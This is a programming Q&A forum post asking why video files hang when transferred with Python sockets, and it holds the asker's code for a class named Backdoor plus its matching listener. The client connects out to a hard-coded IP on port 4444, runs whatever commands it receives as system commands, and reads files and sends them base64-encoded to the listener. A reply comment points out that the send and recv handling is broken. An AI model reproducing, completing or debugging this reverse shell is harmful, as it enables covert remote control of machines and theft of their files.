# Can't download .mp4 files with socket

Tags: python, sockets

```
# Client Code

import os
import socket
import subprocess
import json
import base64


class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data.encode())

    def reliable_receive(self):
        json_data = b""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def read_file(self, path):
        with open(path, "rb") as file:
            file_content = file.read()
            return base64.b64encode(file_content).decode()

    def run(self):
        while True:
            received_command = self.reliable_receive()
            if received_command[0] == "exit":
                self.connection.close()
                exit()
            elif received_command[0] == "cd" and len(received_command) > 1:
                command_result = self.change_working_directory_to(received_command[1])
            elif received_command[0] == "download":
                command_result = self.read_file(received_command[1])
            else:
                command_result = self.execute_system_command(received_command)
            self.reliable_send(command_result)


my_backdoor = Backdoor("10.87.13.44", 4444)
my_backdoor.run()
```

```
# Server Code

import shlex
import socket
import json
import base64


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connections")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data.encode())

    def reliable_receive(self):
        json_data = b""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def write_file(self, path, content):
        file_content = base64.b64decode(content.encode())
        with open(path, "wb") as file:
            file.write(file_content)
            return "[+] Download successful"

    def run(self):
        while True:
            command = input(">> ")
            command = shlex.split(command)
            result = self.execute_remotely(command)
            if command[0] == "download":
                result = self.write_file(command[1], result)
            print(result)


my_listener = Listener("10.87.13.44", 4444)
my_listener.run()
```

I'm trying to download any file type from the client to server using read and write file. I can't download .mp4 files. Images and text files are fine but when I try to download videos the program just stucks and I don't get any error messages too. Tried to encode content of the file with base64 before sending it to the server.

Comment: These "reliable_*" functions are in no way reliable. You assume that `send` will send everything and `recv` will receive everything. You also assume that a `send` will be a 1:1 match to a `recv`. All of these assumptions are wrong.